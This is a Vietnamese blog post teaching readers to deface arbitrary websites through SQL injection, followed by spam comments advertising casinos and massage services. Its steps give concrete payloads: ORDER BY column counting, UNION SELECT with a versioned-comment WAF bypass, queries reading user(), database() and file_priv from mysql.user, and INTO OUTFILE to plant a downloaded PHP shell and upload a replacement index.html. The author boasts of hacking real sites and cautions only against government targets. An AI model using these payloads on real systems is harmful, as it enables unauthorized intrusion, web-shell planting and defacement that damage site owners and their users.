Copyright © Nguyễn Duy Bản
Hack giao diện website bằng kĩ thuật SQL injection
Hack giao diện website bằng kĩ thuật SQL injection
SQL injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp. SQL injection có thể cho phép những kẻ tấn công thực hiện các thao tác, delete, insert, update, v.v. trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy. SQL injection thường được biết đến như là một vật trung gian tấn công trên các ứng dụng web có dữ liệu được quản lý bằng các hệ quản trị cơ sở dữ liệu như SQL Server, MySQL, Oracle, DB2, Sysbase...
Hack giao diện website bằng kĩ thuật SQL injection
Dưới đây là demo nhẹ vài trang web mình hack.
Bước chuẩn bị
> Công cụ hackbar của trình duyệt firefox ( các thứ này có thể lên youtube hoặc google tải về )
> Shell.php : ( Dowload Shell ) chọn 1 trong 3 tải về cái nài cũng được <3
> Index.html : Cái này lên google gõ lấy trên mạng rồi về edit lại là được !
Các bước thực hiện
• Bước 1 : Ta tìm đến đường link của 1 trang web bất kì có id = 123 gì đó, vì thường những thành phần như vầy rất dễ bị injection.
Sau 1 hồi tìm ta có được:
xyz. com/latestArticle.php?id=5 ( như hình ảnh đây chỉ là demo )
- Khởi đầu của sql injection luôn là dấu ' do đó mình thử:
xyz. com/latestArticle.php?id=5'
- Kế tiếp ta tìm số cột dùng order by
xyz. com/latestArticle.php?id=5' order by 10-- -
Mặc dù là order by 1 nhưng vẫn bị dính lỗi. Vậy là có vấn đề.
Đầu tiên mình bỏ thử dấu ' xem kết quả,
xyz. com/latestArticle.php?id=5 order by 10-- -
và thông báo lỗi đã hết, ta lại tiếp tục tìm số cột.
Sau 1 hồi mò thì đến cột số28 báo lỗi, còn 27 thì không. Vậy suy ra số cột ta cần tìm là 27
xyz. com/latestArticle.php?id=5 order by 27--
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
• Bước 2 : Sau khi đã có số cột, ta dùng UNION để kết hợp các kết quả của lệnh select
xyz. com/latestArticle.php?id=5 +UNION_ALL+SELECT+1,2,3,4,5,6,7,..........27-- -
Không thấy xuất hiện kết quả, mình thử - vào sau id.
xyz. com/latestArticle.php?id=-5 +UNION_ALL+SELECT+1,2,3,4,5,6,7,..........27-- -
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
• Bước 3 : - Tới đây nếu load không được ta chọn WAF BYPASS -> /*!50000UNION*/ thay vào chổ UNION. rồi load xem
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
Bước 4 : Sau bước tìm được số 7, ta thay số 7 thành user() và load trang như hình dưới :
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
• Bước 5 : Tiếp đến ta thay user() thành database() rồi load trang :
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
• Bước 6 : Bước này , bạn thay database() thành file_priv và thêm +from+mysql.user sau số 27 như hình dưới :
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
• Bước 7: Tiếp đến ta bôi đen file_priv chọn UOT FILE->PHP SCRIPT->UPLOADER SCRIPT ... tất cả như hình :
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
• Bước 8 : Tiếp đến ta thay +from+mysql.user thành +INTO+OUTFILE+'nơi lưu file shell php'-- -
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
• Bước 10 : Bước này ta coppy trang web và thêm sau nó /fileshell.php ở bước trước .
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
và cuối cùng up index.html của các bạn lên ..và xong!!
chúng ta cần thêm /index.html lên link web đó .
 |
| Hack giao diện website bằng kĩ thuật SQL injection |
Lời kết
Không lạm dụng quá mức nhé, đừng tấn công nhầm các trang web chính phủ GOV, kẻo là bị bốc lịch đấy. Trên đây là thủ thuật hack giao diện website bằng kĩ thuật SQL injection. Chúc các bạn thành công. Xin chào và hẹn gặp lại !
2 nhận xét
The Sands Casino Resort, in Tunica Resorts, is a $325 바카라 million destination located just north of Memphis, Mississippi. In 샌즈카지노 addition, choegocasino the resort features
No deposit 강릉 출장마사지 bonus code is required. You'll 공주 출장안마 find 영천 출장마사지 all you need to know about casino free spins no deposit bonus codes. To get a 울산광역 출장마사지 no deposit bonus, 경기도 출장샵 you have to
image quote pre code